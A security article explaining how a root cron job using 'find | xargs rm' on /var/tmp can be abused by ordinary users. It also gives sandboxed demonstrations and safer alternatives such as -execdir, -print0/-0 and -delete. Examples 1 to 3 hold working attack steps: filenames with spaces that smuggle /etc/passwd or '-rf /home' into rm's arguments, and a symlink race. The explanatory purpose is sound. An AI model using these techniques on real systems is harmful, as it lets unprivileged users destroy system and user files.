security problems with find xargs rm

introduction

If root has a cron job like this one, intended to remove old files from a directory,

0 0 * * * find /var/tmp -type f -mtime +30 | xargs rm
then there is a danger of non-root users tricking the command into removing the wrong file(s).

The command line run daily by cron uses find, xargs and rm, joined by a pipe.

This command does remove old files, but at the cost of removing the wrong files if any user abuses it. The command runs as root, so it can remove any file on the computer (and possibly remote files). Its input is every filename under /var/tmp/, and those names can be chosen by any user and can consist of practically any value. It is this combination, a command run as root taking input from all users, that makes it dangerous.

an alternative view

There is a view that, because find only reports files under /var/tmp/ and rm acts on what find gives it, this cron job can never remove files outside that directory. I have even seen this presented as a "proof".

example 1

Rather than keep the reader in suspense while competing theories are batted back and forth, let's go straight to an experiment that shows the reality behind this command.

Any user runs commands such as these:

cd /var/tmp
mkdir -p 'charlie /etc/passwd /chaplin'
cd 'charlie /etc/passwd /chaplin'
touch -t 197001012359 haha
find /var/tmp -type f -mtime +30
The output from find should include this line complete with the spaces that were put in the directory names.
/var/tmp/charlie /etc/passwd /chaplin/haha
The cron job passes that output through xargs to rm, resulting in the removal of the files /var/tmp/charlie, /etc/passwd and /chaplin/haha if they all exist. [1]
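The splitting can be watched without removing anything. The sketch below, assuming only a POSIX shell with printf and xargs, pipes the line find printed into xargs as the cron job does, but runs printf in place of rm so that each argument rm would have received is printed in brackets.

```shell
#!/bin/sh
# The one line find printed in example 1: a single pathname containing spaces.
path='/var/tmp/charlie /etc/passwd /chaplin/haha'

# Pass it through xargs exactly as the cron pipeline does, but run printf
# instead of rm so each argument xargs builds is shown in brackets.
args=$(printf '%s\n' "$path" | xargs printf '[%s]\n')
printf '%s\n' "$args"
```

It prints [/var/tmp/charlie], [/etc/passwd] and [/chaplin/haha] on separate lines: one name from find has become three arguments for rm.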

examination of proof

The attempt at proving this command safe does not touch at all on the fact that root is taking input from users. Instead it reasons about the program. (That one line in cron is a program: written instructions telling the computer what to do.) The program has four parts:

  1. find to list files matching the criteria
  2. xargs to convert standard input into arguments
  3. rm to remove files whose names are given as arguments
  4. pipe (|) to supply the output of find as input to xargs
But the proof looks only at the first part and takes a short cut, assuming the rest is unimportant. In fact it is the behaviour of the whole four-part program that we care about. What is missing is an examination of whether the files reported by find are always the same ones removed by rm.

To ensure the correct files get removed you could do with showing

Example 1 has the command failing the third of these requirements, because of whitespace in the names. Programmers know the computer is a stupid thing that does what it is told, right or wrong. Here some of what it is told comes from any user who can write under /var/tmp, and the programmer should be prepared for that.

But the first two requirements are not met either. That means more examples of file removal.

example 2

Any user runs commands such as these:
cd /var/tmp
mkdir -p 'a/b/c/d/e/f/g/h/i/j/k/l/m'
cd 'a/b/c/d/e/f/g/h/i/j/k/l/m'
touch -t 197001012359 passwd
Then, at a moment after find has listed that file for removal but before rm has run:
cd 'a/b/c/d/e/f/g/h/i/j/k/l'
mv m old-m
ln -s /etc m
and the file that gets removed is /etc/passwd, because the path find reported now leads through the symbolic link m. Making this change at the right time takes a little work. It is easier when a large directory tree containing many files to remove is being searched, since that widens the window in which the change has to be made. A process run by the attacker can monitor the atime of the directories being searched to help make the change at a suitable time. [2] And if an attack fails, then as long as it has no adverse outcome it can simply be set up again for the next scheduled run of the command.
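The same race can be replayed harmlessly in a scratch directory. In this sketch every name is illustrative: $sandbox/tmp plays /var/tmp, $sandbox/target plays /etc, and the deep tree is shortened to a/b/m. Rather than winning a timing race, it simply saves find's output, makes the swap, and only then hands the saved list to xargs rm, which is the order of events the attacker is aiming for. It assumes mktemp -d is available and returns a path without whitespace.

```shell
#!/bin/sh
set -eu
# Scratch area: "$sandbox/tmp" plays /var/tmp and "$sandbox/target" plays /etc.
sandbox=$(mktemp -d)
mkdir -p "$sandbox/tmp/a/b/m" "$sandbox/target"
echo 'precious' > "$sandbox/target/passwd"
touch -t 197001012359 "$sandbox/tmp/a/b/m/passwd"   # old decoy owned by the "attacker"

# 1. find reports the decoy, exactly as the cron job would.
list=$(find "$sandbox/tmp" -type f -mtime +30)

# 2. Before rm runs, the attacker replaces directory m with a symlink to the target.
mv "$sandbox/tmp/a/b/m" "$sandbox/tmp/a/b/old-m"
ln -s "$sandbox/target" "$sandbox/tmp/a/b/m"

# 3. rm is handed the name find reported; path lookup now follows the symlink.
printf '%s\n' "$list" | xargs rm

# Record what happened, then clean up (rm -rf removes the symlink, not what it points to).
if [ -e "$sandbox/target/passwd" ]; then target=survived; else target=removed; fi
if [ -e "$sandbox/tmp/a/b/old-m/passwd" ]; then decoy=survived; else decoy=removed; fi
echo "target: $target, decoy: $decoy"
rm -rf "$sandbox"
```

It reports the target as removed and the decoy, now sitting in old-m, as surviving.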

limitations

In example 2 we are limited to removing a file with the same name (the basename, not including the directory it is in) as the one reported by find. So if the original command had been

0 0 * * * find /var/tmp -type f -mtime +30 -name \*.txt | xargs rm
we could not use it to remove /etc/passwd.

And provided rm works as advertised, example 1 does not allow us to remove directories recursively. For that we need to look a little deeper.

But it turns out that the rm program from GNU coreutils, as found on GNU/Linux, reads its command-line arguments with the function getopt_long(). By default that keeps processing options even after non-options (filenames in this case) have been seen.

while ((c = getopt_long (argc, argv, "dfirvIR", long_opts, NULL)) != -1)
If ... the environment variable POSIXLY_CORRECT is set, then option processing stops as soon as a nonoption argument is encountered. [3]
With the default setting (POSIXLY_CORRECT not set), a simple name like this one, once split by xargs, gets recursive removal:
/var/tmp/charlie -rf /home /chaplin/haha
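On GNU/Linux the permutation can be seen in a scratch directory. This sketch assumes GNU coreutils rm and that POSIXLY_CORRECT is unset; rather than creating the file, it feeds the text find would print straight to xargs rm, with a stand-in home directory inside the scratch area in place of /home. All names are illustrative, and the mktemp path is assumed to contain no whitespace.

```shell
#!/bin/sh
# Sketch for GNU coreutils rm only; POSIXLY_CORRECT must be unset.
unset POSIXLY_CORRECT
sandbox=$(mktemp -d)
mkdir -p "$sandbox/home/alice"            # stand-in for /home, with content
touch "$sandbox/home/alice/letter"

# The text find would print for such a file; everything stays inside the scratch area.
name="$sandbox/charlie -rf $sandbox/home $sandbox/chaplin/haha"

# xargs splits it into four arguments. getopt_long() permutes them, so rm
# treats the -rf after the first filename as options; -f also silences the
# errors for the two names that do not exist.
printf '%s\n' "$name" | xargs rm

if [ -d "$sandbox/home" ]; then home=survived; else home=removed; fi
echo "stand-in home directory: $home"
rm -rf "$sandbox"
```

With GNU rm the stand-in home directory is removed recursively. An rm that stops option processing at the first filename would instead complain that -rf does not exist and that the home directory is a directory.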
If you are free from this peculiarity (on a non-GNU system, for instance), recursive removal is a bit harder, but not much.

example 3

So far we have not needed to alter the text strings passed between find and rm.

0 0 * * * find /var/tmp -type f -mtime +30 | xargs rm
Notice that I refer to text strings and not filenames. find outputs filenames, but the later parts of the program handle them as text strings with no particular meaning until, inside rm, they are once again treated as filenames.

The key to getting the strings changed lies in xargs. There is a limit on the length of the argument list a program can be executed with (exceeding it gives the error E2BIG), so xargs breaks a very long list before that point and runs rm again with the remaining arguments until they are all used. So this example involves passing lots of text through the pipeline to force multiple executions of rm. [4]
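The limit xargs works within can be inspected directly. This sketch prints ARG_MAX, the POSIX limit on the combined size of arguments and environment passed to exec(), and, where GNU xargs is installed, the buffer sizes it will actually use. --show-limits is a GNU option, so a fallback message covers other systems; the numbers vary between systems, as footnote 4 notes.

```shell
#!/bin/sh
# Maximum combined size, in bytes, of arguments and environment for exec().
arg_max=$(getconf ARG_MAX)
echo "ARG_MAX: $arg_max"

# GNU xargs reports the limits it will use (on stderr); -r stops it running
# a command for the empty input.
xargs -r --show-limits </dev/null 2>&1 || echo "(--show-limits not supported here)"
```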

What this gains is more control over rm's execution. We already had

rm /var/tmp/charlie /etc/passwd /chaplin/haha
but in this case we can get the second execution of rm (unlike the first) to have options of our choice before the filenames:
rm /var/tmp/charlie.......
rm -rf /home/.......
So an attacker wants to get "-rf /" or something similar to the front of an argument list, by placing it at the right point in the input to xargs: just after the boundary between two executions of rm. The attacker is helped by the fact that rm is not fussy about repeated options, and
rm -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf /something
is accepted. An attacker can therefore make long filenames of "-rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf -rf" and easily get these into the right place. [5]
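The effect of a batch boundary can be imitated without generating megabytes of names. In this sketch xargs -n 4 (at most four arguments per command) stands in for the real size limit, "echo rm" prints each command instead of running it, and the input names are made up for illustration.

```shell
#!/bin/sh
# Hypothetical find output: two ordinary names, then one name whose spaces
# make xargs split off a run of "-rf" words.
# xargs -n 4 imitates the size limit falling after the fourth argument;
# "echo rm" prints each command line instead of running it.
cmds=$(printf '%s\n' /var/tmp/a /var/tmp/b '/var/tmp/x/y -rf -rf -rf -rf /home' |
    xargs -n 4 echo rm)
printf '%s\n' "$cmds"
```

It prints "rm /var/tmp/a /var/tmp/b /var/tmp/x/y -rf" and then "rm -rf -rf -rf /home". In the first command -rf follows a filename, so an rm that stops option processing there takes it as just another name; the second begins with it, so even such an rm removes recursively. A long run of -rf words means the real boundary only has to land somewhere inside the run.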

literature

GNU documentation refers to the problem of interpretation seen in example 1 (the security problems described are not unique to the GNU versions of these programs).

the construction

find ... -print | xargs ...

does not cope correctly with newlines or other white space in file names [6]

"Security Considerations for xargs" says
... attacker to create files with names of their choice on the filesystem, then xargs is insecure unless the -0 option is used. If a file with the name /home/someuser/foo/bar\n/etc/passwd exists (assume that \n stands for a newline character), then find ... -print can be persuaded to print three separate lines:

/home/someuser/foo/bar

/etc/passwd

...

The only ways to avoid this problem are either to avoid all use of xargs in favour for example of "find -exec" or (where available) "find -execdir", or to use the "-0" option, which ensures that xargs considers file names to be separated by ASCII NUL characters [7]
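The newline case described in the GNU manual can be checked in a scratch directory. This sketch creates one file whose name contains a newline and counts how many arguments xargs produces from it, first with -print and then with -print0 and xargs -0. It assumes mktemp -d, a scratch path without whitespace, and support for -print0 and -0 (GNU findutils and the BSDs have them).

```shell
#!/bin/sh
set -eu
sandbox=$(mktemp -d)
mkdir "$sandbox/foo"
# One file whose name contains a newline: "bar<newline>passwd".
touch "$(printf '%s/foo/bar\npasswd' "$sandbox")"

# sh -c 'echo "$#"' prints how many arguments xargs passed to it.
plain=$(find "$sandbox/foo" -type f -print | xargs sh -c 'echo "$#"' sh)
nul=$(find "$sandbox/foo" -type f -print0 | xargs -0 sh -c 'echo "$#"' sh)

printf 'with -print: %s arguments; with -print0/-0: %s argument\n' "$plain" "$nul"
rm -rf "$sandbox"
```

With -print the one file becomes 2 arguments; with -print0 and -0 it stays 1.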

The problem of a changing filesystem (example 2) is also described:

A problem exists because there is a time gap between the point where find decides that it needs to process the "-exec" action and the point where the /bin/rm command actually issues the unlink() system call to delete the file from the filesystem. ... Once the symbolic link is in place, the attacker has persuaded find to cause the deletion of the /etc/passwd file, which is not the effect intended [8]

Problem 5 in an exam paper seen online asks for an exploit (provided in C) for a cron command using xargs. [9]

mitigations

"-exec rm {} \;" is better than "| xargs rm" because it avoids reinterpreting the text passed to another command: each name reaches rm as a single argument. It is fully portable, so if your version of find lacks the other features mentioned in this article, "-exec rm {} \;" still protects you from two of the three kinds of attack described (examples 1 and 3; the race in example 2 remains).

"-execdir" is better than "-exec"

GNU find implements a more secure variant of the "-exec" action, "-execdir". The "-execdir" action ensures that it is not necessary to dereference subdirectories to process target files. The current directory used to invoke programs is the same as the directory in which the file to be processed exists [8]
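The three forms can be compared in a scratch directory that rebuilds the example 1 layout, with $sandbox/tmp standing in for /var/tmp and a file called victim for /etc/passwd. This is a sketch under stated assumptions: GNU find and rm (footnote 1 notes that Solaris rm differs), mktemp -d, and a scratch path without whitespace. GNU find also refuses to run -execdir when PATH contains a relative directory such as ".".

```shell
#!/bin/sh
set -eu
sandbox=$(mktemp -d)

# Rebuild the example 1 layout: "$sandbox/tmp" stands in for /var/tmp and
# "$sandbox/victim" for /etc/passwd.
setup() {
    rm -rf "$sandbox/tmp"
    echo 'precious' > "$sandbox/victim"
    dir="$sandbox/tmp/charlie $sandbox/victim $sandbox/chaplin"
    mkdir -p "$dir"
    touch -t 197001012359 "$dir/haha"
}
victim_state() {
    if [ -e "$sandbox/victim" ]; then echo survived; else echo removed; fi
}

setup
# Vulnerable form: xargs splits the one pathname into three arguments.
# rm fails on the two that do not exist, hence "|| true" under set -e.
find "$sandbox/tmp" -type f -mtime +30 | xargs rm 2>/dev/null || true
with_xargs=$(victim_state)

setup
# -exec: rm receives the whole pathname as one argument.
find "$sandbox/tmp" -type f -mtime +30 -exec rm {} \;
with_exec=$(victim_state)

setup
# -execdir: the command runs inside the file's own directory with a relative name.
execdir_arg=$(find "$sandbox/tmp" -type f -mtime +30 -execdir echo {} \;)
find "$sandbox/tmp" -type f -mtime +30 -execdir rm {} \;
with_execdir=$(victim_state)
if [ -e "$dir/haha" ]; then old=kept; else old=removed; fi

echo "victim after | xargs rm: $with_xargs"
echo "victim after -exec rm: $with_exec"
echo "victim after -execdir rm: $with_execdir (rm was given $execdir_arg)"
rm -rf "$sandbox"
```

On GNU/Linux the victim is removed only by the | xargs rm run; with -exec and -execdir just the old file goes, and -execdir hands rm the relative name ./haha.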

GNU find has a "-print0" action and GNU xargs a matching "-0" option; used together they separate names with NUL characters, so whitespace in filenames cannot cause confusion. [7]

"-delete" is available in GNU find and avoids the need to call an external program to do the removal at all - a solution that improves safety and efficiency.

Even on old systems there is no excuse for using "| xargs rm" when there are better alternatives and the possibility of an unintended "rm -rf /" has been proved.
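The -delete form can be checked in the same kind of scratch layout, with an extra recent file that must be kept. It is a sketch assuming a find with -delete (GNU find has it), mktemp -d, and a scratch path without whitespace; the names are illustrative.

```shell
#!/bin/sh
set -eu
sandbox=$(mktemp -d)
echo 'precious' > "$sandbox/victim"                   # stands in for /etc/passwd
dir="$sandbox/tmp/charlie $sandbox/victim $sandbox/chaplin"
mkdir -p "$dir"
touch -t 197001012359 "$dir/haha"                     # old: should go
touch "$sandbox/tmp/recent"                           # new: should stay

# find unlinks matches itself: no pipe, no xargs, no rm to reinterpret names.
# -delete must come after the tests, because find evaluates left to right.
find "$sandbox/tmp" -type f -mtime +30 -delete

if [ -e "$dir/haha" ]; then old=kept; else old=removed; fi
if [ -e "$sandbox/tmp/recent" ]; then recent=kept; else recent=removed; fi
if [ -e "$sandbox/victim" ]; then victim=kept; else victim=removed; fi
echo "old file $old, recent file $recent, victim $victim"
rm -rf "$sandbox"
```

Only the old file is removed. In the cron job the equivalent line would be
0 0 * * * find /var/tmp -type f -mtime +30 -delete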

what this means for storage

World-writable directories are almost always trouble. You can encourage use of a temporary directory per user (such as ~/tmp/) but when you face working with a shared world-writable directory it would help to have extra options in the storage and not just in the commands used to clean it. That may be the subject of a future article.


footnotes

  1. Solaris rm expects files to exist and in example 1 if /var/tmp/charlie did not exist /etc/passwd would not be removed.

  2. The relatime mount behaviour may interfere with detecting read access unless you are aware of it and set times appropriately.

  3. getopt_long(3) man page

  4. The limit that triggers E2BIG used to be a few thousand characters, but is around 2625000 characters on the Linux box I just tested and around 327225 on OpenBSD.
    strace -ff -q -e trace=execve perl -e 'open(F,">/tmp/u");close(F); $i=525000 ; system("rm ". (" -rf " x $i) ." /tmp/u")'

    execve("/usr/bin/perl", ["perl", "-e", "open(F,\">/tmp/u\");close(F); $i="...], [/* 99 vars */]) = 0
    [pid 9924] execve("/usr/bin/rm", ["rm", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", "-rf", ...], [/* 99 vars */]) = -1 E2BIG (Argument list too long)

  5. Details of the recursive removal of directories are here.

  6. https://www.gnu.org/software/findutils/manual/html_mono/find.html#Security-Considerations-for-find

  7. https://www.gnu.org/software/findutils/manual/html_mono/find.html#Security-Considerations-for-xargs

  8. https://www.gnu.org/software/findutils/manual/html_mono/find.html#Race-Conditions-with-_002dexec

  9. http://cr.yp.to/2004-494/1209.pdf
version 3
Written by Peter M Allan. 2014 updated 2017